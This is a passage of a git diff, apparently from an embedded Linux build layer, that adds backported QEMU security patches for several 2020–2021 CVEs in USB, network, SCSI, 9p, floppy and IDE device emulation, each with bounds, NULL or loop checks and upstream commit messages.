+@@ -764,7 +768,12 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed,
+ }
+ } else {
+ /* Last packet in the ISO TD */
+- end_addr = iso_td.be;
++ end_addr = next_offset;
++ }
++
++ if (start_addr > end_addr) {
++ trace_usb_ohci_iso_td_bad_cc_overrun(start_addr, end_addr);
++ return 1;
+ }
+
+ if ((start_addr & OHCI_PAGE_MASK) != (end_addr & OHCI_PAGE_MASK)) {
+@@ -773,6 +782,9 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed,
+ } else {
+ len = end_addr - start_addr + 1;
+ }
++ if (len > sizeof(ohci->usb_buf)) {
++ len = sizeof(ohci->usb_buf);
++ }
+
+ if (len && dir != OHCI_TD_DIR_IN) {
+ if (ohci_copy_iso_td(ohci, start_addr, end_addr, ohci->usb_buf, len,
+@@ -975,8 +987,16 @@ static int ohci_service_td(OHCIState *ohci, struct ohci_ed *ed)
+ if ((td.cbp & 0xfffff000) != (td.be & 0xfffff000)) {
+ len = (td.be & 0xfff) + 0x1001 - (td.cbp & 0xfff);
+ } else {
++ if (td.cbp > td.be) {
++ trace_usb_ohci_iso_td_bad_cc_overrun(td.cbp, td.be);
++ ohci_die(ohci);
++ return 1;
++ }
+ len = (td.be - td.cbp) + 1;
+ }
++ if (len > sizeof(ohci->usb_buf)) {
++ len = sizeof(ohci->usb_buf);
++ }
+
+ pktlen = len;
+ if (len && dir != OHCI_TD_DIR_IN) {
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch
new file mode 100644
index 0000000000..374d7c4562
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-25625.patch
@@ -0,0 +1,42 @@
+From 1be90ebecc95b09a2ee5af3f60c412b45a766c4f Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 15 Sep 2020 23:52:59 +0530
+Subject: [PATCH] hw: usb: hcd-ohci: check for processed TD before retire
+
+While servicing OHCI transfer descriptors(TD), ohci_service_iso_td
+retires a TD if it has passed its time frame. It does not check if
+the TD was already processed once and holds an error code in TD_CC.
+It may happen if the TD list has a loop. Add check to avoid an
+infinite loop condition.
+
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Message-id: 20200915182259.68522-3-ppandit@redhat.com
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-25625
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/usb/hcd-ohci.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/hw/usb/hcd-ohci.c b/hw/usb/hcd-ohci.c
+index 9dc59101f9..8b912e95d3 100644
+--- a/hw/usb/hcd-ohci.c
++++ b/hw/usb/hcd-ohci.c
+@@ -691,6 +691,10 @@ static int ohci_service_iso_td(OHCIState *ohci, struct ohci_ed *ed,
+ the next ISO TD of the same ED */
+ trace_usb_ohci_iso_td_relative_frame_number_big(relative_frame_number,
+ frame_count);
++ if (OHCI_CC_DATAOVERRUN == OHCI_BM(iso_td.flags, TD_CC)) {
++ /* avoid infinite loop */
++ return 1;
++ }
+ OHCI_SET_BM(iso_td.flags, TD_CC, OHCI_CC_DATAOVERRUN);
+ ed->head &= ~OHCI_DPTR_MASK;
+ ed->head |= (iso_td.next & OHCI_DPTR_MASK);
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-25723.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-25723.patch
new file mode 100644
index 0000000000..e6e0f5ec30
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-25723.patch
@@ -0,0 +1,52 @@
+From 2fdb42d840400d58f2e706ecca82c142b97bcbd6 Mon Sep 17 00:00:00 2001
+From: Li Qiang <liq3ea@163.com>
+Date: Wed, 12 Aug 2020 09:17:27 -0700
+Subject: [PATCH] hw: ehci: check return value of 'usb_packet_map'
+
+If 'usb_packet_map' fails, we should stop to process the usb
+request.
+
+Signed-off-by: Li Qiang <liq3ea@163.com>
+Message-Id: <20200812161727.29412-1-liq3ea@163.com>
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+
+Upstream-Status: Backport [https://git.qemu.org/?p=qemu.git;a=commit;h=2fdb42d840400d58f2e706ecca82c142b97bcbd6]
+CVE: CVE-2020-25723
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ hw/usb/hcd-ehci.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/hw/usb/hcd-ehci.c b/hw/usb/hcd-ehci.c
+index 58cceac..4da446d 100644
+--- a/hw/usb/hcd-ehci.c
++++ b/hw/usb/hcd-ehci.c
+@@ -1373,7 +1373,10 @@ static int ehci_execute(EHCIPacket *p, const char *action)
+ spd = (p->pid == USB_TOKEN_IN && NLPTR_TBIT(p->qtd.altnext) == 0);
+ usb_packet_setup(&p->packet, p->pid, ep, 0, p->qtdaddr, spd,
+ (p->qtd.token & QTD_TOKEN_IOC) != 0);
+- usb_packet_map(&p->packet, &p->sgl);
++ if (usb_packet_map(&p->packet, &p->sgl)) {
++ qemu_sglist_destroy(&p->sgl);
++ return -1;
++ }
+ p->async = EHCI_ASYNC_INITIALIZED;
+ }
+
+@@ -1453,7 +1456,10 @@ static int ehci_process_itd(EHCIState *ehci,
+ if (ep && ep->type == USB_ENDPOINT_XFER_ISOC) {
+ usb_packet_setup(&ehci->ipacket, pid, ep, 0, addr, false,
+ (itd->transact[i] & ITD_XACT_IOC) != 0);
+- usb_packet_map(&ehci->ipacket, &ehci->isgl);
++ if (usb_packet_map(&ehci->ipacket, &ehci->isgl)) {
++ qemu_sglist_destroy(&ehci->isgl);
++ return -1;
++ }
+ usb_handle_packet(dev, &ehci->ipacket);
+ usb_packet_unmap(&ehci->ipacket, &ehci->isgl);
+ } else {
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch
new file mode 100644
index 0000000000..7bfc2beecb
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-27617.patch
@@ -0,0 +1,49 @@
+From 7564bf7701f00214cdc8a678a9f7df765244def1 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Wed, 21 Oct 2020 11:35:50 +0530
+Subject: [PATCH] net: remove an assert call in eth_get_gso_type
+
+eth_get_gso_type() routine returns segmentation offload type based on
+L3 protocol type. It calls g_assert_not_reached if L3 protocol is
+unknown, making the following return statement unreachable. Remove the
+g_assert call, it maybe triggered by a guest user.
+
+Reported-by: Gaoning Pan <pgn@zju.edu.cn>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upsteram-Status: Backport
+CVE: CVE-2020-27617
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ net/eth.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/net/eth.c b/net/eth.c
+index 0c1d413ee2..1e0821c5f8 100644
+--- a/net/eth.c
++++ b/net/eth.c
+@@ -16,6 +16,7 @@
+ */
+
+ #include "qemu/osdep.h"
++#include "qemu/log.h"
+ #include "net/eth.h"
+ #include "net/checksum.h"
+ #include "net/tap.h"
+@@ -71,9 +72,8 @@ eth_get_gso_type(uint16_t l3_proto, uint8_t *l3_hdr, uint8_t l4proto)
+ return VIRTIO_NET_HDR_GSO_TCPV6 | ecn_state;
+ }
+ }
+-
+- /* Unsupported offload */
+- g_assert_not_reached();
++ qemu_log_mask(LOG_UNIMP, "%s: probably not GSO frame, "
++ "unknown L3 protocol: 0x%04"PRIx16"\n", __func__, l3_proto);
+
+ return VIRTIO_NET_HDR_GSO_NONE | ecn_state;
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-27821.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-27821.patch
new file mode 100644
index 0000000000..e26bc31bbb
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-27821.patch
@@ -0,0 +1,73 @@
+From 15222d4636d742f3395fd211fad0cd7e36d9f43e Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Tue, 16 Aug 2022 10:07:01 +0530
+Subject: [PATCH] CVE-2020-27821
+
+Upstream-Status: Backport [https://git.qemu.org/?p=qemu.git;a=commit;h=4bfb024bc76973d40a359476dc0291f46e435442]
+CVE: CVE-2020-27821
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+memory: clamp cached translation in case it points to an MMIO region
+
+In using the address_space_translate_internal API, address_space_cache_init
+forgot one piece of advice that can be found in the code for
+address_space_translate_internal:
+
+ /* MMIO registers can be expected to perform full-width accesses based only
+ * on their address, without considering adjacent registers that could
+ * decode to completely different MemoryRegions. When such registers
+ * exist (e.g. I/O ports 0xcf8 and 0xcf9 on most PC chipsets), MMIO
+ * regions overlap wildly. For this reason we cannot clamp the accesses
+ * here.
+ *
+ * If the length is small (as is the case for address_space_ldl/stl),
+ * everything works fine. If the incoming length is large, however,
+ * the caller really has to do the clamping through memory_access_size.
+ */
+
+address_space_cache_init is exactly one such case where "the incoming length
+is large", therefore we need to clamp the resulting length---not to
+memory_access_size though, since we are not doing an access yet, but to
+the size of the resulting section. This ensures that subsequent accesses
+to the cached MemoryRegionSection will be in range.
+
+With this patch, the enclosed testcase notices that the used ring does
+not fit into the MSI-X table and prints a "qemu-system-x86_64: Cannot map used"
+error.
+
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+---
+ exec.c | 10 ++++++++++
+ 1 file changed, 10 insertions(+)
+
+diff --git a/exec.c b/exec.c
+index 2d6add46..1360051a 100644
+--- a/exec.c
++++ b/exec.c
+@@ -3632,6 +3632,7 @@ int64_t address_space_cache_init(MemoryRegionCache *cache,
+ AddressSpaceDispatch *d;
+ hwaddr l;
+ MemoryRegion *mr;
++ Int128 diff;
+
+ assert(len > 0);
+
+@@ -3640,6 +3641,15 @@ int64_t address_space_cache_init(MemoryRegionCache *cache,
+ d = flatview_to_dispatch(cache->fv);
+ cache->mrs = *address_space_translate_internal(d, addr, &cache->xlat, &l, true);
+
++ /*
++ * cache->xlat is now relative to cache->mrs.mr, not to the section itself.
++ * Take that into account to compute how many bytes are there between
++ * cache->xlat and the end of the section.
++ */
++ diff = int128_sub(cache->mrs.size,
++ int128_make64(cache->xlat - cache->mrs.offset_within_region));
++ l = int128_get64(int128_min(diff, int128_make64(l)));
++
+ mr = cache->mrs.mr;
+ memory_region_ref(mr);
+ if (memory_access_is_direct(mr, is_write)) {
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch
new file mode 100644
index 0000000000..756b1c1495
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-28916.patch
@@ -0,0 +1,48 @@
+From c2cb511634012344e3d0fe49a037a33b12d8a98a Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Wed, 11 Nov 2020 18:36:36 +0530
+Subject: [PATCH] hw/net/e1000e: advance desc_offset in case of null descriptor
+
+While receiving packets via e1000e_write_packet_to_guest() routine,
+'desc_offset' is advanced only when RX descriptor is processed. And
+RX descriptor is not processed if it has NULL buffer address.
+This may lead to an infinite loop condition. Increament 'desc_offset'
+to process next descriptor in the ring to avoid infinite loop.
+
+Reported-by: Cheol-woo Myung <330cjfdn@gmail.com>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: Jason Wang <jasowang@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-28916
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/net/e1000e_core.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/hw/net/e1000e_core.c b/hw/net/e1000e_core.c
+index d8b9e4b2f4..095c01ebc6 100644
+--- a/hw/net/e1000e_core.c
++++ b/hw/net/e1000e_core.c
+@@ -1596,13 +1596,13 @@ e1000e_write_packet_to_guest(E1000ECore *core, struct NetRxPkt *pkt,
+ (const char *) &fcs_pad, e1000x_fcs_len(core->mac));
+ }
+ }
+- desc_offset += desc_size;
+- if (desc_offset >= total_size) {
+- is_last = true;
+- }
+ } else { /* as per intel docs; skip descriptors with null buf addr */
+ trace_e1000e_rx_null_descriptor();
+ }
++ desc_offset += desc_size;
++ if (desc_offset >= total_size) {
++ is_last = true;
++ }
+
+ e1000e_write_rx_descr(core, desc, is_last ? core->rx_pkt : NULL,
+ rss_info, do_ps ? ps_hdr_len : 0, &bastate.written);
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-29443.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-29443.patch
new file mode 100644
index 0000000000..1528d5c2fd
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-29443.patch
@@ -0,0 +1,45 @@
+From 813212288970c39b1800f63e83ac6e96588095c6 Mon Sep 17 00:00:00 2001
+From: Paolo Bonzini <pbonzini@redhat.com>
+Date: Tue, 1 Dec 2020 13:09:26 +0100
+Subject: [PATCH] ide: atapi: assert that the buffer pointer is in range
+
+A case was reported where s->io_buffer_index can be out of range.
+The report skimped on the details but it seems to be triggered
+by s->lba == -1 on the READ/READ CD paths (e.g. by sending an
+ATAPI command with LBA = 0xFFFFFFFF). For now paper over it
+with assertions. The first one ensures that there is no overflow
+when incrementing s->io_buffer_index, the second checks for the
+buffer overrun.
+
+Note that the buffer overrun is only a read, so I am not sure
+if the assertion failure is actually less harmful than the overrun.
+
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+Message-id: 20201201120926.56559-1-pbonzini@redhat.com
+Reviewed-by: Kevin Wolf <kwolf@redhat.com>
+Signed-off-by: Peter Maydell <peter.maydell@linaro.org>
+
+Upstream-Status: Backport
+CVE: CVE-2020-29443
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/ide/atapi.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/hw/ide/atapi.c b/hw/ide/atapi.c
+index 14a2b0bb2f..e79157863f 100644
+--- a/hw/ide/atapi.c
++++ b/hw/ide/atapi.c
+@@ -276,6 +276,8 @@ void ide_atapi_cmd_reply_end(IDEState *s)
+ s->packet_transfer_size -= size;
+ s->elementary_transfer_size -= size;
+ s->io_buffer_index += size;
++ assert(size <= s->io_buffer_total_len);
++ assert(s->io_buffer_index <= s->io_buffer_total_len);
+
+ /* Some adapters process PIO data right away. In that case, we need
+ * to avoid mutual recursion between ide_transfer_start
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-35504.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-35504.patch
new file mode 100644
index 0000000000..97d32589d8
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-35504.patch
@@ -0,0 +1,51 @@
+Backport of:
+
+From 0db895361b8a82e1114372ff9f4857abea605701 Mon Sep 17 00:00:00 2001
+From: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
+Date: Wed, 7 Apr 2021 20:57:50 +0100
+Subject: [PATCH] esp: always check current_req is not NULL before use in DMA
+ callbacks
+
+After issuing a SCSI command the SCSI layer can call the SCSIBusInfo .cancel
+callback which resets both current_req and current_dev to NULL. If any data
+is left in the transfer buffer (async_len != 0) then the next TI (Transfer
+Information) command will attempt to reference the NULL pointer causing a
+segfault.
+
+Buglink: https://bugs.launchpad.net/qemu/+bug/1910723
+Buglink: https://bugs.launchpad.net/qemu/+bug/1909247
+Signed-off-by: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Message-Id: <20210407195801.685-2-mark.cave-ayland@ilande.co.uk>
+
+CVE: CVE-2020-35504
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-35504.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/0db895361b8a82e1114372ff9f4857abea605701 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/scsi/esp.c | 19 ++++++++++++++-----
+ 1 file changed, 14 insertions(+), 5 deletions(-)
+
+--- a/hw/scsi/esp.c
++++ b/hw/scsi/esp.c
+@@ -362,6 +362,11 @@ static void do_dma_pdma_cb(ESPState *s)
+ do_cmd(s, s->cmdbuf);
+ return;
+ }
++
++ if (!s->current_req) {
++ return;
++ }
++
+ s->dma_left -= len;
+ s->async_buf += len;
+ s->async_len -= len;
+@@ -415,6 +420,9 @@ static void esp_do_dma(ESPState *s)
+ do_cmd(s, s->cmdbuf);
+ return;
+ }
++ if (!s->current_req) {
++ return;
++ }
+ if (s->async_len == 0) {
+ /* Defer until data is available. */
+ return;
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-35505.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-35505.patch
new file mode 100644
index 0000000000..40c0b1e74f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-35505.patch
@@ -0,0 +1,45 @@
+Backport of:
+
+From 99545751734035b76bd372c4e7215bb337428d89 Mon Sep 17 00:00:00 2001
+From: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
+Date: Wed, 7 Apr 2021 20:57:55 +0100
+Subject: [PATCH] esp: ensure cmdfifo is not empty and current_dev is non-NULL
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+When about to execute a SCSI command, ensure that cmdfifo is not empty and
+current_dev is non-NULL. This can happen if the guest tries to execute a TI
+(Transfer Information) command without issuing one of the select commands
+first.
+
+Buglink: https://bugs.launchpad.net/qemu/+bug/1910723
+Buglink: https://bugs.launchpad.net/qemu/+bug/1909247
+Signed-off-by: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk>
+Reviewed-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Tested-by: Alexander Bulekov <alxndr@bu.edu>
+Message-Id: <20210407195801.685-7-mark.cave-ayland@ilande.co.uk>
+
+CVE: CVE-2020-35505
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-35505.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/99545751734035b76bd372c4e7215bb337428d89 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+Signed-off-by: Emily Vekariya <emily.vekariya@einfochips.com>
+---
+ hw/scsi/esp.c | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/hw/scsi/esp.c b/hw/scsi/esp.c
+index c7d701bf..c2a67bc8 100644
+--- a/hw/scsi/esp.c
++++ b/hw/scsi/esp.c
+@@ -193,6 +193,10 @@ static void do_busid_cmd(ESPState *s, uint8_t *buf, uint8_t busid)
+
+ trace_esp_do_busid_cmd(busid);
+ lun = busid & 7;
++
++ if (!s->current_dev) {
++ return;
++ }
+ current_lun = scsi_device_find(&s->bus, 0, s->current_dev->id, lun);
+ s->current_req = scsi_req_new(current_lun, 0, lun, buf, s);
+ datalen = scsi_req_enqueue(s->current_req);
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-20181.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-20181.patch
new file mode 100644
index 0000000000..1b8c77f838
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-20181.patch
@@ -0,0 +1,81 @@
+From c2d2d14e8deece958bbc4fc649d22c3564bc4e7e Mon Sep 17 00:00:00 2001
+From: Greg Kurz <groug@kaod.org>
+Date: Thu, 14 Jan 2021 17:04:12 +0100
+Subject: [PATCH] 9pfs: Fully restart unreclaim loop (CVE-2021-20181)
+
+Depending on the client activity, the server can be asked to open a huge
+number of file descriptors and eventually hit RLIMIT_NOFILE. This is
+currently mitigated using a reclaim logic : the server closes the file
+descriptors of idle fids, based on the assumption that it will be able
+to re-open them later. This assumption doesn't hold of course if the
+client requests the file to be unlinked. In this case, we loop on the
+entire fid list and mark all related fids as unreclaimable (the reclaim
+logic will just ignore them) and, of course, we open or re-open their
+file descriptors if needed since we're about to unlink the file.
+
+This is the purpose of v9fs_mark_fids_unreclaim(). Since the actual
+opening of a file can cause the coroutine to yield, another client
+request could possibly add a new fid that we may want to mark as
+non-reclaimable as well. The loop is thus restarted if the re-open
+request was actually transmitted to the backend. This is achieved
+by keeping a reference on the first fid (head) before traversing
+the list.
+
+This is wrong in several ways:
+- a potential clunk request from the client could tear the first
+ fid down and cause the reference to be stale. This leads to a
+ use-after-free error that can be detected with ASAN, using a
+ custom 9p client
+- fids are added at the head of the list : restarting from the
+ previous head will always miss fids added by a some other
+ potential request
+
+All these problems could be avoided if fids were being added at the
+end of the list. This can be achieved with a QSIMPLEQ, but this is
+probably too much change for a bug fix. For now let's keep it
+simple and just restart the loop from the current head.
+
+Fixes: CVE-2021-20181
+Buglink: https://bugs.launchpad.net/qemu/+bug/1911666
+Reported-by: Zero Day Initiative <zdi-disclosures@trendmicro.com>
+Reviewed-by: Christian Schoenebeck <qemu_oss@crudebyte.com>
+Reviewed-by: Stefano Stabellini <sstabellini@kernel.org>
+Message-Id: <161064025265.1838153.15185571283519390907.stgit@bahia.lan>
+Signed-off-by: Greg Kurz <groug@kaod.org>
+
+Upstream-Status: Backport [89fbea8737e8f7b954745a1ffc4238d377055305]
+CVE: CVE-2021-20181
+
+Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com>
+---
+ hw/9pfs/9p.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/hw/9pfs/9p.c b/hw/9pfs/9p.c
+index 94df440fc..6026b51a1 100644
+--- a/hw/9pfs/9p.c
++++ b/hw/9pfs/9p.c
+@@ -502,9 +502,9 @@ static int coroutine_fn v9fs_mark_fids_unreclaim(V9fsPDU *pdu, V9fsPath *path)
+ {
+ int err;
+ V9fsState *s = pdu->s;
+- V9fsFidState *fidp, head_fid;
++ V9fsFidState *fidp;
+
+- head_fid.next = s->fid_list;
++again:
+ for (fidp = s->fid_list; fidp; fidp = fidp->next) {
+ if (fidp->path.size != path->size) {
+ continue;
+@@ -524,7 +524,7 @@ static int coroutine_fn v9fs_mark_fids_unreclaim(V9fsPDU *pdu, V9fsPath *path)
+ * switched to the worker thread
+ */
+ if (err == 0) {
+- fidp = &head_fid;
++ goto again;
+ }
+ }
+ }
+--
+2.29.2
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-20196.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-20196.patch
new file mode 100644
index 0000000000..e9b815740f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-20196.patch
@@ -0,0 +1,62 @@
+From 94608c59045791dfd35102bc59b792e96f2cfa30 Mon Sep 17 00:00:00 2001
+From: Vivek Kumbhar <vkumbhar@mvista.com>
+Date: Tue, 29 Nov 2022 15:57:13 +0530
+Subject: [PATCH] CVE-2021-20196
+
+Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/1ab95af033a419e7a64e2d58e67dd96b20af5233]
+CVE: CVE-2021-20196
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+
+hw/block/fdc: Kludge missing floppy drive to fix CVE-2021-20196
+
+Guest might select another drive on the bus by setting the
+DRIVE_SEL bit of the DIGITAL OUTPUT REGISTER (DOR).
+The current controller model doesn't expect a BlockBackend
+to be NULL. A simple way to fix CVE-2021-20196 is to create
+an empty BlockBackend when it is missing. All further
+accesses will be safely handled, and the controller state
+machines keep behaving correctly.
+---
+ hw/block/fdc.c | 19 ++++++++++++++++++-
+ 1 file changed, 18 insertions(+), 1 deletion(-)
+
+diff --git a/hw/block/fdc.c b/hw/block/fdc.c
+index ac5d31e8..e128e975 100644
+--- a/hw/block/fdc.c
++++ b/hw/block/fdc.c
+@@ -58,6 +58,11 @@
+ } \
+ } while (0)
+
++/* Anonymous BlockBackend for empty drive */
++static BlockBackend *blk_create_empty_drive(void)
++{
++ return blk_new(qemu_get_aio_context(), 0, BLK_PERM_ALL);
++}
+
+ /********************************************************/
+ /* qdev floppy bus */
+@@ -1356,7 +1361,19 @@ static FDrive *get_drv(FDCtrl *fdctrl, int unit)
+
+ static FDrive *get_cur_drv(FDCtrl *fdctrl)
+ {
+- return get_drv(fdctrl, fdctrl->cur_drv);
++ FDrive *cur_drv = get_drv(fdctrl, fdctrl->cur_drv);
++
++ if (!cur_drv->blk) {
++ /*
++ * Kludge: empty drive line selected. Create an anonymous
++ * BlockBackend to avoid NULL deref with various BlockBackend
++ * API calls within this model (CVE-2021-20196).
++ * Due to the controller QOM model limitations, we don't
++ * attach the created to the controller device.
++ */
++ cur_drv->blk = blk_create_empty_drive();
++ }
++ return cur_drv;
+ }
+
+ /* Status A register : 0x00 (read-only) */
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2021-20203.patch b/meta/recipes-devtools/qemu/qemu/CVE-2021-20203.patch
new file mode 100644
index 0000000000..31440af0bd
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2021-20203.patch
@@ -0,0 +1,74 @@
+From: Prasad J Pandit <pjp@fedoraproject.org>
+
+While activating device in vmxnet3_acticate_device(), it does not
+validate guest supplied configuration values against predefined
+minimum - maximum limits. This may lead to integer overflow or
+OOB access issues. Add checks to avoid it.
+
+Fixes: CVE-2021-20203
+Buglink: https://bugs.launchpad.net/qemu/+bug/1913873
+Reported-by: Gaoning Pan <pgn@zju.edu.cn>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+
+Upstream-Status: Acepted [https://lists.gnu.org/archive/html/qemu-devel/2021-01/msg07935.html]
+CVE: CVE-2021-20203
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ hw/net/vmxnet3.c | 13 +++++++++++++
+ 1 file changed, 13 insertions(+)
+
+diff --git a/hw/net/vmxnet3.c b/hw/net/vmxnet3.c
+index eff299f629..4a910ca971 100644
+--- a/hw/net/vmxnet3.c
++++ b/hw/net/vmxnet3.c
+@@ -1420,6 +1420,7 @@ static void vmxnet3_activate_device(VMXNET3State *s)
+ vmxnet3_setup_rx_filtering(s);
+ /* Cache fields from shared memory */
+ s->mtu = VMXNET3_READ_DRV_SHARED32(d, s->drv_shmem, devRead.misc.mtu);
++ assert(VMXNET3_MIN_MTU <= s->mtu && s->mtu < VMXNET3_MAX_MTU);
+ VMW_CFPRN("MTU is %u", s->mtu);
+
+ s->max_rx_frags =
+@@ -1473,6 +1474,9 @@ static void vmxnet3_activate_device(VMXNET3State *s)
+ /* Read rings memory locations for TX queues */
+ pa = VMXNET3_READ_TX_QUEUE_DESCR64(d, qdescr_pa, conf.txRingBasePA);
+ size = VMXNET3_READ_TX_QUEUE_DESCR32(d, qdescr_pa, conf.txRingSize);
++ if (size > VMXNET3_TX_RING_MAX_SIZE) {
++ size = VMXNET3_TX_RING_MAX_SIZE;
++ }
+
+ vmxnet3_ring_init(d, &s->txq_descr[i].tx_ring, pa, size,
+ sizeof(struct Vmxnet3_TxDesc), false);
+@@ -1483,6 +1487,9 @@ static void vmxnet3_activate_device(VMXNET3State *s)
+ /* TXC ring */
+ pa = VMXNET3_READ_TX_QUEUE_DESCR64(d, qdescr_pa, conf.compRingBasePA);
+ size = VMXNET3_READ_TX_QUEUE_DESCR32(d, qdescr_pa, conf.compRingSize);
++ if (size > VMXNET3_TC_RING_MAX_SIZE) {
++ size = VMXNET3_TC_RING_MAX_SIZE;
++ }
+ vmxnet3_ring_init(d, &s->txq_descr[i].comp_ring, pa, size,
+ sizeof(struct Vmxnet3_TxCompDesc), true);
+ VMXNET3_RING_DUMP(VMW_CFPRN, "TXC", i, &s->txq_descr[i].comp_ring);
+@@ -1524,6 +1531,9 @@ static void vmxnet3_activate_device(VMXNET3State *s)
+ /* RX rings */
+ pa = VMXNET3_READ_RX_QUEUE_DESCR64(d, qd_pa, conf.rxRingBasePA[j]);
+ size = VMXNET3_READ_RX_QUEUE_DESCR32(d, qd_pa, conf.rxRingSize[j]);
++ if (size > VMXNET3_RX_RING_MAX_SIZE) {
++ size = VMXNET3_RX_RING_MAX_SIZE;
++ }
+ vmxnet3_ring_init(d, &s->rxq_descr[i].rx_ring[j], pa, size,
+ sizeof(struct Vmxnet3_RxDesc), false);
+ VMW_CFPRN("RX queue %d:%d: Base: %" PRIx64 ", Size: %d",
+@@ -1533,6 +1543,9 @@ static void vmxnet3_activate_device(VMXNET3State *s)
+ /* RXC ring */
+ pa = VMXNET3_READ_RX_QUEUE_DESCR64(d, qd_pa, conf.compRingBasePA);
+ size = VMXNET3_READ_RX_QUEUE_DESCR32(d, qd_pa, conf.compRingSize);
++ if (size > VMXNET3_RC_RING_MAX_SIZE) {
++ size = VMXNET3_RC_RING_MAX_SIZE;
++ }
+ vmxnet3_ring_init(d, &s->rxq_descr[i].comp_ring, pa, size,
+ sizeof(struct Vmxnet3_RxCompDesc), true);
+ VMW_CFPRN("RXC queue %d: Base: %" PRIx64 ", Size: %d", i, pa, size);
+--
+2.29.2
+
